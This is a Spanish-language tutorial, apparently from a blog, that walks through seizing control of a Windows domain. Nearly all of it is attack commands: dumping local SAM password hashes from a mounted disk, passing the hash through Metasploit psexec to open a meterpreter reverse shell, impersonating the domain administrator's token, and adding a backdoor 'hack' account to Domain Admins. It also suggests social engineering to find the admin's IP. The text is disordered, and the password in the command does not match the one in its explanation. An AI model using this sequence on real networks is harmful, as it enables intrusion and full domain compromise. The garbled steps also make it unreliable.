- Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
- Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
- Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
- Una copia de BackTrack 4
Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:
Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:
- mount /dev/sda1 /mnt/sda1
Montamos la particion de la maquina windows - cd /mnt/sda1/WINDOWS/system32/config
accedemos a la carpeta dodne se encuentra el archivo SAM - samdump2 system SAM
sacamos los hash de los usuarios en la maquina windows - msfconsole
ejecutamos el metasploit por consola - use windows/smb/psexec
utilizamos el psexec - exploit -p windows/meterpreter/reverse_tcp -o
utilizamos la shell meterpreter - LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
configuramos las opciones del exploit - sessions -i 1
una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra - use incognito
utilizamos el modulo incognito de meterpreter - list_tokens -u
mostramos los tokens - impersonate_token mydomain\domainadmin
tomamos las credenciales del administrador de dominio - execute -f cmd.exe -i -t
lanzamos la consola de windows - net user hack MPass5678 /add /domain
Agregamos el usuario “hack” con clave “MPass46782″ al dominio - net group “Domain Admins” hack /add /domain
metemos el usuario hack al grupo de administradores de dominio - Ya hemos tomado el control del dominio de windows